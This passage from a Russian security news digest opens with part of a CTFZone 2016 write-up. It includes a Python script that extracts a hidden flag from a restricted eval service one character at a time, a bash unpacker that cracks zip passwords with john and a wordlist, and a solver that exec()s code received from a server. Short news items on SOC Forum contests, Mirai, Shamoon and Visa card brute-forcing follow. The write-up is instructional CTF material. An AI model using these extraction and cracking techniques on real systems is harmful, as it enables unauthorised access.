    Судя по ошибкам, в ответ отдается результат, приведенный к типу float. Если результат привести нельзя, то возникает ValueError. Если нет такой функции, то NameError.
    Попробуем выяснить список доступных функций методом перебора.

    image

    При этом все попытки использовать underscore, например, class, не работают из-за HackingAttempt.
    Но, используя ord и str, можно вычислить любую переменную, например, результат dir, который возвращает список всех доступных имен в окружении.

    Код бруттера:

    #!/usr/bin/python2
    import socket
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("95.85.41.197", 8888))
    
    print s.recv(1024)
    
    result = ''
    for i in range(0, 300):
      request = "ord(str(dir())[%d])" % i
     # request = "ord(verysecretflag[%d])" % i
      s.send(request)
      response = s.recv(32)
      if 'Err' in response or 'occurred' in response:
        result += '_'
      else:
        result += chr(int(response.split(': ')[1].split('.')[0]))
    print result

    В результате перебора получается следующий список:

    ['HackingAttempt', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'e', 'f', 'inp', 'print1337', 're', 'regex', 'sys', 'verysecretflag']

    Флаг лежит в переменной verysecretflag. Print, он переименован в print1337
    Чтобы получить ответ, следует сделать вот так:

    image

    Вот и наш флаг!

    Ответ: ctfzone{123456}



    MISC_500. Archive maniac
    A.U.R.O.R.A.: Oh God! Lieutenant, I need you here on the ship control station. Autopilot is broken and we need a secret code to switch to manual control. Only our pilot Chekhov knows it and he is dead drunk, so you have to figure it out. I noticed that he was concerned about storage efficiency and confidentiality. And he also preferred number 32 to 64 with no obvious reason.


    Решение:

    В этом задании участнику предлагается найти секретный код, однако сложность заключается в том, что этот ключ зашифрован. К сожалению, тот, кто обладает информацией, в ближайшие сутки ничего вразумительного сказать не сможет… Мы знаем, что он старался обеспечить надежное хранение и конфиденциальность, а также почему-то и предпочитал число 32 вместо 64. Попробуем разобраться.

    Для начала посмотрим на наши исходные данные. В самом задании дается ссылка на архив arch.tar.gz, в котором содержатся следующие файлы:


    Файлы архива
    [briskly@archlinux tmp]$ tar -xvf arch.tar.gz 
    archive/
    archive/flag3.png
    archive/flag9.png
    archive/flag7.png
    archive/flag6.png
    archive/flag2.png
    archive/flag4.png
    archive/flag5.png
    archive/flag0.png
    archive/flag1.png
    archive/flag8.png
    archive/.gitkeep
    [briskly@archlinux tmp]$ file archive/*
    archive/flag0.png: cpio archive
    archive/flag1.png: bzip2 compressed data, block size = 900k
    archive/flag2.png: bzip2 compressed data, block size = 900k
    archive/flag3.png: compress'd data 16 bits
    archive/flag4.png: LRZIP compressed data - version 0.6
    archive/flag5.png: rzip compressed data - version 2.1 (370344 bytes)
    archive/flag6.png: compress'd data 16 bits
    archive/flag7.png: Zip archive data
    archive/flag8.png: ARJ archive data, v11, slash-switched, original name: , os: Unix
    archive/flag9.png: cpio archive

    Похоже, что в архиве 10 файлов с расширением .png, но при этом каждый файл является архивом. Судя по листингу файлов, архивы очень разные. Пришло время учиться пользоваться экзотикой.

    Пожалуй, начнем:

    [briskly@archlinux archive]$ bzip2 -d flag1.png
    bzip2: Can't guess original name for flag1.png -- using flag1.png.out
    [briskly@archlinux archive]$ file flag1.png.out 
    flag1.png.out: LRZIP compressed data - version 0.6

    Похоже, что в этих архивах находятся другие архивы. Пробуем расшифровать zip файл. 7z сразу попросил пароль:

    [briskly@archlinux archive]$ 7z x flag7.png
    7-Zip [64] 16.02: Copyright (c) 1999-2016 Igor Pavlov: 2016-05-21
    p7zip Version 16.02 (locale=ru_RU.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (406E3),ASM,AES-NI)
    
    Scanning the drive for archives:
    1 file, 385755 bytes (377 KiB)
    
    Extracting archive: flag7.png
    --
    Path = flag7.png
    Type = zip
    Physical Size = 385755
    
    Enter password (will not be echoed):

    В данном случае стоит автоматизировать процесс извлечения из архива, поскольку их очень много:


    Извлекаем из архива
    #!/bin/bash
    
    FILE="$1"
    FLAG="flag.png"
    TMP_DIR="PNGs"
    
    # Dirty:
    [ ! -d "./$TMP_DIR" ] && mkdir "$TMP_DIR" && echo -e "\n [+] Creating temp folder: $TMP_DIR."
    [ ! -f "./$FLAG" ] && cp $FILE flag.png && echo -e " [+] Creating temp file: $FLAG.\n"
    
    deArch () {
        CHECK=`file "$FLAG"`
    
        if [[ $CHECK == *"rzip compressed data"* ]]
        then
            echo -e " [*] Now $FLAG is RZIP data (.rz)\n [+] Extracting $FLAG\n"
            mv flag.png{,.rz}
            runzip -d flag.png.rz
            #rm flag.png.rz
            sleep 1
            deArch
    
        elif [[ $CHECK == *"LRZIP compressed data"* ]]
        then
            echo -e " [*] Now $FLAG is LRZIP archive (.lrz)\n [+] Extracting $FLAG\n"
            mv flag.png{,.lrz}
            lrunzip flag.png.lrz > /dev/null
            rm flag.png.lrz
            sleep 1
            deArch
    
        elif [[ $CHECK == *"bzip2 compressed data"* ]]
        then
            echo -e " [*] Now $FLAG is BZIP file (.bz2)\n [+] Extracting $FLAG\n"
            mv flag.png{,.bz2}
            bzip2 -d flag.png.bz2 #> /dev/null
            sleep 1
            deArch
    
        elif [[ $CHECK == *"compress'd data 16 bits"* ]]
        then
            echo -e " [*] Now $FLAG is unix compressed file (.z)\n [+] Extracting $FLAG\n"
            mv flag.png{,.z}
            uncompress flag.png.z
            sleep 1
            deArch
    
        elif [[ $CHECK == *"7-zip archive data"* ]]
        then
            echo -e " [*] Now $FLAG is 7-ZIP archive (.7z)\n [+] Extracting $FLAG\n"
            mv flag.png{,.7z}
            7z x flag.png.7z > /dev/null
            rm flag.png.7z
            sleep 1
            deArch
    
        elif [[ $CHECK == *"ARJ archive data, v11, slash-switched"* ]]
        then
            echo -e " [*] Now $FLAG is ARJ archive (.arj)\n [+] Extracting $FLAG\n"
            mv flag.png{,.arj}
            arj x flag.png.arj > /dev/null
            rm flag.png.arj
            sleep 1
            deArch
    
        elif [[ $CHECK == *"cpio archive"* ]]
        then
            echo -e " [*] Now $FLAG is CPIO archive (.cpio)\n [+] Extracting $FLAG\n"
            mv flag.png{,.cpio}
            cpio -idv < flag.png.cpio 2> /dev/null
            rm flag.png.cpio
            sleep 1
            deArch
    
        elif [[ $CHECK == *"current ar archive"* ]]
        then
            echo -e " [*] Now $FLAG is AR archive (.a)\n [+] Extracting $FLAG\n"
            mv flag.png{,.a}
            ar x flag.png.a
            rm flag.png.a
            sleep 1
            deArch
    
        elif [[ $CHECK == *"Zip archive data"* ]]
        then
            echo -e " [*] Now $FLAG is zip archive (.zip)\n [+] Extracting $FLAG\n"
            mv flag.png{,.zip}
            #mv flag.png{,.7z}
    
            ENC_CHCK=`7z l -slt -- flag.png.zip | grep -ic "Encrypted = +"`
            if [ "$ENC_CHCK" -eq "1" ]
            then
                #exit 1
                echo " [!] PASSWORD pretocted archive"
                zip2john flag.png.zip | awk -F: '{print $2}' > hash.lst
                rm -rf /root/.john/john.*
                #ZIP_PASS=`john hash.lst 2>&1 > /dev/null | awk '/\(\?\)/ {print $1}'`
                ZIP_PASS=`john hash.lst --wordlist=/usr/share/wordlists/rockyou.txt 2>&1 | awk '/\(\?\)/ {print $1}'`
    
                if [[ -z "$ZIP_PASS" ]]
                then
                    #echo -e "$ZIP_PASS"
                    echo -e " [-] Your pass was not found, please, try it manually..."
                else
                    echo -e " [+] Voila! Your pass is: \e[1;33m$ZIP_PASS\e[0;0m, extracting an archive...\n"
                    7z x -p"$ZIP_PASS" flag.png.zip > /dev/null
                    rm flag.png.zip
                    sleep 1
                    deArch
                fi
            else
                7z x flag.png.zip
                sleep 1
                deArch
            fi
    
            #sleep 1
            #deArch
    
        elif [[ $CHECK == *"PNG image data"* ]]
        then
            echo -e " [\e[1;32m*\e[0;0m] Now $FLAG is PNG image file !!!\n [\e[1;32m+\e[0;0m] Open this: ./$TMP_DIR/$FILE\n"
            sleep 1
            #eog flag.png 2> /dev/null
            mv $FLAG $TMP_DIR/$FILE
            exit 0
    
        else
            echo -e "\n [-] Hernya! $CHECK"
        fi
    }
    
    deArch

    Результат работы скрипта:


    Результат
    bash deArch.sh flag4.png 
    
     [+] Creating temp folder: PNGs.
     [+] Creating temp file: flag.png.
    
     [*] Now flag.png is ARJ archive (.arj)
     [+] Extracting flag.png
    
     [*] Now flag.png is zip archive (.zip)
     [+] Extracting flag.png
    
     [!] PASSWORD pretocted archive
     [+] Voila! Your pass is: love123, extracting an archive...
    
     [*] Now flag.png is unix compressed file (.z)
     [+] Extracting flag.png
    
     [*] Now flag.png is AR archive (.a)
     [+] Extracting flag.png
    
     [*] Now flag.png is BZIP file (.bz2)
     [+] Extracting flag.png
    
     [*] Now flag.png is CPIO archive (.cpio)
     [+] Extracting flag.png
    
     [*] Now flag.png is RZIP data (.rz)
     [+] Extracting flag.png
    
     [*] Now flag.png is 7-ZIP archive (.7z)
     [+] Extracting flag.png
    
     [*] Now flag.png is LRZIP archive (.lrz)
     [+] Extracting flag.png
    
     [*] Now flag.png is PNG image file !!!
     [+] Open this: ./PNGs/flag4.png

    В результате из файла вытаскивается flag4.png

    image

    Итак, получена картинка! Посмотрим, что внутри – может быть, там есть стеганография?
    Для этого запустим Stegsolve, и, изменив некоторые настройки, получим что-то вполне разборчивое:

    image

    Судя по знакам =, это похоже на base64. Но все буквы заглавные (uppercase). Вспомним легенду, где сказано, что тот человек, который обладал знаниями, предпочитал число 32. Попробуем base32, в результате чего получаем TPAU'XAPDEP.
    Выполняем те же действия по отношению к остальным файлам.

    В итоге получаем следующее:

    thisnotaflag
    thisisflag,joke
    noflaghere
    noo000000op
    CTFZONE{5dbb39d62d31b1c
    notflagagain
    flagwashere
    025f3b0e3a987d375}part2
    kakoyflag?
    TPAU'XAPDEP

    Вот и наш флаг!

    Ответ: ctfzone{5dbb39d62d31b1c025f3b0e3a987d375}part2



    MISC_1000. Molibden|Gamma
    A.U.R.O.R.A.: Lieutenant, you’ve got to the command center. It’s time to go home and join our comrades! Wait, something is wrong with the systems. Some basic libraries are lost. Computer can't find the route. You need to help computer make some simple calculations. Quick, we are almost there!


    Решение:

    Итак, мы практически у цели! Чтобы получить управление кораблем, необходимо исправить ошибку в системе.

    Итак, запускаем программу. Пример работы программы мы видим на скриншоте.

    image

    Из легенды понятно, что нам нужно интерпретировать код, который присылает сервер.
    Для получения решения придется показать свои навыки программирования.

    Так как код написан на Python, то первое очевидное решение – это сделать exec и отправить его результат обратно. Код будет выглядеть следующим образом:

    from socket import create_connection
    from time import time
    
    sock = create_connection(("95.85.41.197", 8887))
    
    for i in range(10):
        res = None
        code = sock.recv(102400)
        code = code.decode()
        code = "\n".join(code.split("\n")[:-2])
        if "gone wrong" in code:
            print(code)
            exit(0)
    
        start = time()
        l = res = None
    
        print(code)
        exec(code)
        res = res or l
    
        print(time() - start)
        code = None
    
        res = str(res).encode()
        try:
            sock.send(res + b"\n")
        except Exception:
            print(sock.recv(102400))
            print(sock.recv(102400))
            print(sock.recv(102400))
            break

    После этого приходит код со sleep, который тормозит исполнение:

    from time import sleep
    
    k = 96
    s = 36
    c = 98
    
    mas = []
    
    for i in range(c):
        sleep(0.1)
        mas.append(s)
        s += k
    
    res = 0
    
    for el in mas:
        sleep(0.1)
        res += el
    
    print(res)

    Эта проблема решается просто вырезанием sleep по регулярке. Например, вот так:

    code = code.replace("sleep(0.1)", "")

    Следующее усложнение заключается в том, что sleep переименовывается при импорте:

    from time import sleep as JecYvyk

    В данном случае можно написать регулярку или просто сделать replace:

    code = code.replace("sleep", "gmtime")

    В следующий раз решение останавливается на шаге с кодом, в котором используются большие числа:

    from time import gmtime as rluVx
    
    k = 82194181
    s = 55474764
    c = 54888629
    
    mas = []
    
    for i in range(c):
        rluVx(2*0.01)
        mas.append(s)
        s += k
    
    res = 0
    
    for el in mas:
        rluVx(2*0.01)
        res += el
    
    print(res)

    На данном этапе программа не выполняется по двум причинам — либо заканчивается память, либо сервер выдает ошибку:

    Something gone wrong: TimeoutError

    Очевидно, что просто решить данную задачу не получится, придется разбираться в коде. При первой оценке кода можно заметить, что это очень похоже на сумму арифметической прогрессии.
    Так как функция написана действительно неэффективно, то вместо обычного подсчета линейной формулой, формируется массив со всеми элементами арифметической прогрессии, а потом складывается. Напишем эту формулу:

    def solve(k, s, c):
        return str((2*s + k*(c-1))*c//2)

    Выглядит она довольно просто.

    Следующая проблема заключается в том, что перестает успевать выполняться код:

    from time import sleep as Rkyv
    from random import shuffle
    
    l = [5984807, 6299947, 10119240, 13578507, 14224900, 15238270, 15513380, 16429758]
    
    while True:
        Rkyv(0o10*0.01)
        shuffle(l)
        prev = None
        is_sorted = True
        for el in l:
            Rkyv(0o10*0.01)
            if prev is None:
                prev = el
            elif prev >= el:
                is_sorted = False
                break
            prev = el
        if is_sorted:
            break
    print(l)

    Придется разобраться и с этой задачей. Очень похоже на monkey_sort, но, судя по всему, этот код выполнить невозможно. Перепишем на обычный sort, который предоставляет нам Python. Но и этого оказывается недостаточно.
    В результате наступает момент, когда обычный exec перестает успевать считать 'страшный' обфусцированный код:


    Страшный обфусцированный код
    from time import sleep as EB
    
    s = b'Vt\xe9\xe9\xed\x05J\xdaEQ'
    
    def func3(s):
        def func1(OOOOOOOOO0000OOO0 ):
            ""
            PI_SUBST =[41 ,46 ,67 ,201 ,162 ,216 ,124 ,1 ,61 ,54 ,84 ,161 ,236 ,240 ,6 ,19 ,98 ,167 ,5 ,243 ,192 ,199 ,115 ,140 ,152 ,147 ,43 ,217 ,188 ,76 ,130 ,202 ,30 ,155 ,87 ,60 ,253 ,212 ,224 ,22 ,103 ,66 ,111 ,24 ,138 ,23 ,229 ,18 ,190 ,78 ,196 ,214 ,218 ,158 ,222 ,73 ,160 ,251 ,245 ,142 ,187 ,47 ,238 ,122 ,169 ,104 ,121 ,145 ,21 ,178 ,7 ,63 ,148 ,194 ,16 ,137 ,11 ,34 ,95 ,33 ,128 ,127 ,93 ,154 ,90 ,144 ,50 ,39 ,53 ,62 ,204 ,231 ,191 ,247 ,151 ,3 ,255 ,25 ,48 ,179 ,72 ,165 ,181 ,209 ,215 ,94 ,146 ,42 ,172 ,86 ,170 ,198 ,79 ,184 ,56 ,210 ,150 ,164 ,125 ,182 ,118 ,252 ,107 ,226 ,156 ,116 ,4 ,241 ,69 ,157 ,112 ,89 ,100 ,113 ,135 ,32 ,134 ,91 ,207 ,101 ,230 ,45 ,168 ,2 ,27 ,96 ,37 ,173 ,174 ,176 ,185 ,246 ,28 ,70 ,97 ,105 ,52 ,64 ,126 ,15 ,85 ,71 ,163 ,35 ,221 ,81 ,175 ,58 ,195 ,92 ,249 ,206 ,186 ,197 ,234 ,38 ,44 ,83 ,13 ,110 ,133 ,40 ,132 ,9 ,211 ,223 ,205 ,244 ,65 ,129 ,77 ,82 ,106 ,220 ,55 ,200 ,108 ,193 ,171 ,250 ,36 ,225 ,123 ,8 ,12 ,189 ,177 ,74 ,120 ,136 ,149 ,139 ,227 ,99 ,232 ,109 ,233 ,203 ,213 ,254 ,59 ,0 ,29 ,57 ,242 ,239 ,183 ,14 ,102 ,88 ,208 ,228 ,166 ,119 ,114 ,248 ,235 ,117 ,75 ,10 ,49 ,68 ,80 ,180 ,143 ,237 ,31 ,26 ,219 ,153 ,141 ,51 ,159 ,17 ,131 ,20 ]
            O00OOOO0OOOO00000 =OOOOOOOOO0000OOO0 
            OO00OO000OO0OO000 =len (O00OOOO0OOOO00000 )
            O00OOOO0OOOO00000 +=chr (16 -(OO00OO000OO0OO000 %16 )).encode ("utf-8")*(16 -(OO00OO000OO0OO000 %16 ))
            O00OOOO0O0OOO00O0 =O00OOOO0OOOO00000 
            OO00OO000OO0OO000 =len (O00OOOO0OOOO00000 )
            OOOOO0O0000000OO0 =bytearray (b"\x00"*16 )
            OO0O0O000OOOO0O0O =0 
            for O0OOO0OO000OO00O0 in range (OO00OO000OO0OO000 //16 ):
                EB(0x3*0.01)
                for OO00O00OOO000OO00 in range (16 ):
                    EB(0x3*0.01)
                    O0O0OOOO000O0OO0O =O00OOOO0O0OOO00O0 [O0OOO0OO000OO00O0 *16 +OO00O00OOO000OO00 ]
                    OOOOO0O0000000OO0 [OO00O00OOO000OO00 ]=OOOOO0O0000000OO0 [OO00O00OOO000OO00 ]^PI_SUBST [O0O0OOOO000O0OO0O ^OO0O0O000OOOO0O0O ]
                    OO0O0O000OOOO0O0O =OOOOO0O0000000OO0 [OO00O00OOO000OO00 ]
    
            OO0OOO00OOO00000O =O00OOOO0O0OOO00O0 +OOOOO0O0000000OO0 
            OO00OO000OO0OO000 +=16 
            OOO00O00O0O0O0OO0 =bytearray ([0 ])*48 
            for O0OOO0OO000OO00O0 in range (OO00OO000OO0OO000 //16 ):
                for OO00O00OOO000OO00 in range (16 ):
                    EB(0x3*0.01)
                    OOO00O00O0O0O0OO0 [16 +OO00O00OOO000OO00 ]=OO0OOO00OOO00000O [O0OOO0OO000OO00O0 *16 +OO00O00OOO000OO00 ]
                    OOO00O00O0O0O0OO0 [32 +OO00O00OOO000OO00 ]=OOO00O00O0O0O0OO0 [16 +OO00O00OOO000OO00 ]^OOO00O00O0O0O0OO0 [OO00O00OOO000OO00 ]
                OOOO0O0OO000000OO =0 
                for OO00O00OOO000OO00 in range (18 ):
                    EB(0x3*0.01)
                    for OOOO00O00OOO0OOOO in range (48 ):
                        EB(0x3*0.01)
                        OOOO0O0OO000000OO =OOO00O00O0O0O0OO0 [OOOO00O00OOO0OOOO ]=OOO00O00O0O0O0OO0 [OOOO00O00OOO0OOOO ]^PI_SUBST [OOOO0O0OO000000OO ]
                    OOOO0O0OO000000OO =(OOOO0O0OO000000OO +OO00O00OOO000OO00 )%256 
            return bytes (OOO00O00O0O0O0OO0 [:16 ])
    
        OO0OOOO00OO0O0O0O = b'Vt\xe9\xe9\xed\x05J\xdaEQ'
    
        def func2(OO0OOOO00OO0O0O0O):
            O00O00OO000OOO00O ='0123456789abcdef'
            return b''.join(map(lambda x: x.encode(), map(lambda O00O0OO0O0OOOO0O0 :O00O00OO000OOO00O [(O00O0OO0O0OOOO0O0 >>4 )&0xf ]+O00O00OO000OOO00O [O00O0OO0O0OOOO0O0 &0xf ],func1 (OO0OOOO00OO0O0O0O ))))
    
        for i in range(100):
            OO0OOOO00OO0O0O0O = func2(OO0OOOO00OO0O0O0O)
        return OO0OOOO00OO0O0O0O.decode()
    
        #print(''.join (map (lambda O00O0OO0O0OOOO0O0 :O00O00OO000OOO00O [(O00O0OO0O0OOOO0O0 >>4 )&0xf ]+O00O00OO000OOO00O [O00O0OO0O0OOOO0O0 &0xf ],func1 (OO0OOOO00OO0O0O0O ))))
    res = func3(s)
    print(res)

    В ходе небольшой деобфускации становится понятно, что скорее всего это какая-то хеш функция, которая последовательно применяется 100 раз. Далее пройти можно двумя способами: либо просто переписать данную функцию на чем-то более быстром (например, C++), либо попробовать поискать таблицу замен, которая захардкожена в коде.

    Попробуем погуглить:

    image

    Достаточно легко догадаться, что это md2. В PYCRYPTO есть быстрая реализация этой функции:

    from Crypto.Hash import MD2
    
    def solve(inp):
        for i in range(params.get("count")):
            h = MD2.new()
            h.update(inp)
            inp = h.hexdigest()
        return inp
    

    Результирующий код solver:


    Код solver
    import re
    import json
    from socket import create_connection
    from solves import md2
    from solves import arifmetic
    from time import time
    
    sock = create_connection(("95.85.41.197", 8887))
    
    r1 = re.compile(r"l = (\[.*\])")
    r21 = re.compile(r"OO0OOOO00OO0O0O0O = (b('|\").*('|\"))\n")
    r22 = re.compile(r"    for i in range\((\d+)\):")
    r3 = re.compile(r".*k = (?P<k>\d+)\ns = (?P<s>\d+)\nc = (?P<c>\d+).*")
    
    def solve1(code):
        reverse = True
        if ">" in code:
            reverse = False
        code = code.split("while True:")[0]
        lst = r1.findall(code)[0]
        lst = json.loads(lst)
        lst.sort(reverse=reverse)
        return lst
    
    def solve2(code):
        data = eval((r21.findall(code))[0][0])
        count = int(r22.findall(code)[0])
        res = md2.solve({"string": data, "count": count})
        return res
    
    def solve3(code):
        for m in r3.finditer(code):
            print (arifmetic.solve({k: int(v) for k, v in m.groupdict().items()}))
            return arifmetic.solve({k: int(v) for k, v in m.groupdict().items()})
    
    while True:
        res = None
        code = sock.recv(102400)
        code = code.decode()
        code = "\n".join(code.split("\n")[:-2])
        code = code.replace("sleep(0.1)", "")
        if "gone wrong" in code:
            print(code)
            exit(0)
    
        start = time()
        if "shuffle" in code:
            res = solve1(code)
        elif "OO0OOOO00OO0O0O0O" in code:
            res = solve2(code)
        elif "mas.append" in code:
            res = solve3(code)
        else:
            print("EXECING")
            print(code)
            exec(code)
            print(sock.recv(102400))
            print(sock.recv(102400))
            print(sock.recv(102400))
            print(sock.recv(102400))
            exit(0)
        print(time()-start)
        code = None
    
        res = str(res).encode()
        try:
            sock.send(res + b"\n")
        except Exception:
            print(sock.recv(102400))
            print(sock.recv(102400))
            break

    В результате получаем долгожданный флаг!

    image

    Ответ: ctfzone{YouRealyHaveSoMuchTime?}


    Кстати, по вашим многочисленным просьбам мы выложили оффлайн задания – теперь поиграться с райтапами можно
    на этом портале. Но не забывайте про наши задания по хайрингу, они будут доступны еще 10 дней до 15.12 – время еще есть!

    Если у вас остались какие-то вопросы – оставляйте комментарии и пишите в наш чат в Telegram. Ничего так не вдохновляет, как ваша активность :)

    Всем добра и удачи!

    orig: 2016-12-05 13:39:22 / https://habrahabr.ru/post/316846/ (click post title)



    Итоги конкурсов SOC Forum 2016

    Подвели итоги трех конкурсов, проводимых в рамках SOC Forum 2016.

    Конкурс для блогеров, журналистов и просто писателей

    Как и в прошлом году, для победы в конкурсе необходимо было написать самую полезную/интересную заметку-обзор про прошедший SOC Forum. Вот авторы и их заметки:

    Посовещались и решили, что победителем этого конкурса стал Денис Батранков, который опубликовал большой обзор презентаций конференции (а точнее идей и схем из них). Неожиданный формат и полезный контент. Денис - молодец!

    Он получает квадрокоптер Walkera QR X350 Pro и экшн-камеру Xiaomi Yi Camera Basic Edition к нему:

    Еще утешительным призом поощрили начинающего блогера Алексея Качалина:

    Конкурс фотографий с конференции

    Главным призом в этой активности стало полное собрание книг "Игра престолов". Помните, что и конференция была в этой концепции?

    В упорной борьбе за количество лайков (по совокупности в ФБ и инстаграм) побеждает Татьяна Игуменшева. Отдельное ей спасибо за фото в интерьере книги, вот оно:А поощрительный приз получает Андрей Чечеткин, он тоже набрал много лайков.
    Конкурс шуток и мемов про SOC

    Тут победителем стал Алексей Лукацкий, он опубликовал самое большое количество шуток и написал об этом отдельную заметку в блоге. Алексей тоже получает собрание книг "Игра престолов", может быть они послужат источником новых идей и вдохновения. 
    Вообще, шуток придумали много, лучшие из них я уже публиковал:А поощрительные призы получат Роман Жуков, Евгений Родыгин и Валерий Естехин.

    orig: 2016-12-05 13:23:18 / http://80na20.blogspot.com/2016/12/soc-forum-2016.html (click post title)



    Украинская компания усомнилась в решимости хакеров атаковать банки

    После широкой огласки хакеры вряд ли решатся атаковать российский финансовый сектор.

    Украинская хостинговая компания BlazingFast прокомментировала предупреждение Федеральной службы безопасности РФ о запланированных на 5 декабря кибератаках. Как сообщает издание «РИА Новости» со ссылкой на представителя BlazingFast, хостинг-провайдер осуществляет непрерывный мониторинг своих систем, «чтобы предотвращать случаи, которые могут возникнуть».

    Напомним, согласно сообщению ФСБ, опубликованному в пятницу, 2 декабря, иностранные спецслужбы запланировали проведение кибератак на российский финансовый сектор, используя серверы компании BlazingFast. По словам представителя компании, на данный момент никакой подозрительной активности среди клиентов зафиксировано не было. Даже если злоумышленники и намеревались атаковать российские банки, то после такой широкой огласки вряд ли решатся осуществить задуманное, уверены в компании.

    В связи с предупреждением ФСБ Центробанк РФ и Минкомсвязи провели совещания с представителями телекоммуникационных компаний и финансовых организаций. Были разработаны инструкции по противостоянию возможным хакерским атакам. По словам представителей Центробанка, ситуация находится под контролем.

    orig: 2016-12-05 12:29:59 / http://www.securitylab.ru/news/484646.php (click post title)



    SkyDNS вошел в рейтинг ТОП-25 лидеров российского рынка облачных технологий

    В ежегодный рейтинг включается информация о ТОП-25 компаниях, предоставляющих ИТ-решения и услуги по облачной модели, а также о финансовых показателях этих компаний (http://bit.ly/2h5yFtn). 

    Покупатели продуктов и сервисов SkyDNS в очередной раз получили подтверждение, что пользуются решениями, разработанными лидером в своей сфере и, что не менее важно, одним из ведущих игроков российского рынка Software as a Service (SaaS). К тому же, еще одной гарантией качества и свидетельством отечественного происхождения разработок SkyDNS служит тот факт, что все они входят в единый реестр российского ПО. При работе с такой компанией клиенты значительно снижают риски покупки непроверенных технологических решений, которые иногда представляют собой "кота в мешке". 

    Облачная инфраструктура SkyDNS включает в себя сеть серверов DNS-фильтрации, расположенных в стратегически важных точках РФ и обрабатывающих до 1 млрд запросов ежедневно. Это позволяет равномерно распределять нагрузку и обеспечивает отказоустойчивость сервиса. Благодаря широкой линейке продуктов и сервисов SkyDNS практически для всех сегментов рынка любой потенциальный клиент найдет подходящее именно ему облачное решение. 

    О компании. SkyDNS - ведущий российский разработчик систем облачной контент-фильтрации и безопасного поиска. Услугами компании пользуются десятки тысяч домашних пользователей, тысячи организаций, школ и более трехсот провайдеров. На базе системы SkyDNS обеспечивается защита школ и библиотек от вредоносных сайтов практически во всех регионах России. Технологии SkyDNS в сфере облачной интернет-фильтрации пользуются растущим спросом у корпоративных клиентов. С помощью продуктов и услуг SkyDNS легко управлять доступом в интернет и организациям с десятком компьютеров, и крупным структурам с разветвленной сетью филиалов, большим количеством компьютеров и Wi-Fi точек.

    В июле 2016 компания внедрила инновационную систему обнаружения ботнетов и вредоносных интернет-ресурсов (malware), основанную на непрерывном машинном обучении и анализе поведения пользователей, что значительно повысило уровень онлайн-безопасности пользователей решений фильтрации SkyDNS. 

    Контакты

    Юлия Неганова,

    SkyDNS, 

    Тел: 8 (800) 333-33-72
    E-mail: neganova@skydns.ru
    Сайт: www.skydns.ru

    orig: 2016-12-05 12:06:35 / http://www.iso27000.ru/Members/SkyDNS/skydns-voshel-v-reiting-top-25-liderov-rossiiskogo-rynka-oblachnyh-tehnologii (click post title)



    Обзор инцидентов безопасности за прошлую неделю

    Краткий обзор инцидентов безопасности за период с 28 ноября по 4 декабря 2016 года.

    Прошедшая неделя ознаменовалась резонансным предупреждением Федеральной службы безопасности РФ о готовящихся кибератаках на российский финансовый сектор и новыми «достижениями» ботнета Mirai. Предлагаем ознакомиться с кратким обзором инцидентов безопасности за период с 28 ноября по 4 декабря 2016 года.

    27-28 ноября порядка 900 тыс. пользователи проводной связи Deutsche Telekom испытывали проблемы с доступом к Сети. Причиной сбоя послужило инфицирование маршрутизаторов новым образцом вредоносного ПО Mirai, предназначенного для заражения устройств производства компании Zyxel. Тогда же кибератаке подверглись 100 тыс. пользовательских маршрутизаторов в Великобритании. Как сообщает Motherboard, ответственность за атаку лежит на двух хакерах, управляющих новым ботнетом Mirai, который злоумышленники теперь предпочитают называть Annie.

    Пока новоиспеченный Annie уверено поднимает голову, правоохранители из 30 стран совместными усилиями ликвидировали ботнет Avalanche. Сеть существовала с 2009 года и использовалась для распространения вредоносного ПО, фишинговых писем и спама. В неделю Avalanche рассылал свыше 1 млн писем с вредоносными ссылками или вложениями. Ежедневно с его помощью вредоносным ПО заражались порядка полумиллиона компьютеров.

    Большой резонанс вызвало предупреждение ФСБ о запланированных на 5 декабря кибератаках на отечественные банки. По данным ФСБ, зарубежные спецслужбы будут вести настоящую информационную войну с помощью массовой рассылки SMS-сообщений и публикаций в социальных сетях и блогах. Целью злоумышленников является дестабилизация российской финансовой системы.

    Специалисты компаний CrowdStrike, Palo Alto Networks и Symantec предупредили о волне атак с использованием нового варианта вредоносного ПО Shamoon. Червь полностью стирает данные с жесткого диска и делает компьютер непригодным для дальнейшего использования. Жертвами атак стали организации в Саудовской Аравии.

    На прошлой неделе уже традиционно не обошлось без сообщений о новом вредоносном ПО для Android. Исследователи компании Palo Alto Networks обнаружили новый Android-троян, использующий фреймворк DroidPlugin для распределения вредоносной активности по нескольким плагинам с целью избежать обнаружения. Данный подход является инновационным для подобного вредоносного ПО.

    Эксперты Check Point рассказали о трояне для Android под названием Gooligan, скомпрометировавшем более 1 млн учетных записей Google. Вредонос инфицирует устройства под управлением версий Android 4 и 5, установленных на 74% смартфонов и планшетов.

    Специалисты компании «Ревизиум» зафиксировали массовые атаки на сайты, работающие на базе CMS MODx Evolution. По данным экспертов, атаки осуществляются с арендованных VPS серверов.

    На прошлой неделе стало известно об утечке данных, касающихся международных расследований Интерпола. Инцидент произошел по вине бывшего сотрудника Европола, нарушившего служебные предписания. Работник взял документы домой и сохранил их на жестком диске, подключенном к интернету. Утекшая информация касается 54 различных полицейских расследований, проводимых в 2006-2008 годах, и в частности содержит имена и номера телефонов подозреваемых.

    orig: 2016-12-05 11:56:23 / http://www.securitylab.ru/news/484645.php (click post title)



    Новый метод позволяет взломать карту Visa за 6 секунд

    Эксперты описали, как можно обойти защиту платежной системы при помощи метода распределенного перебора.

    Исследователи из Ньюкаслского университета продемонстрировали новый метод, позволяющий подобрать номер, дату истечения срока действия и код безопасности карты Visa всего за 6 секунд. В исследовании, опубликованном в журнале IEEE Security & Privacy, эксперты описали, как можно обойти защиту при помощи так называемой атаки распределенного перебора (Distributed Guessing Attack).

    По словам ученых, ни современные платежные системы, ни банки не могут обнаружить многочисленные неудачные попытки хакеров получить доступ к данным кредитных карт. Проверяя разные варианты номеров, дат и кодов безопасности карт на различных сайтах, злоумышленники могут за несколько секунд получить совпадения и подтвердить все необходимые данные.

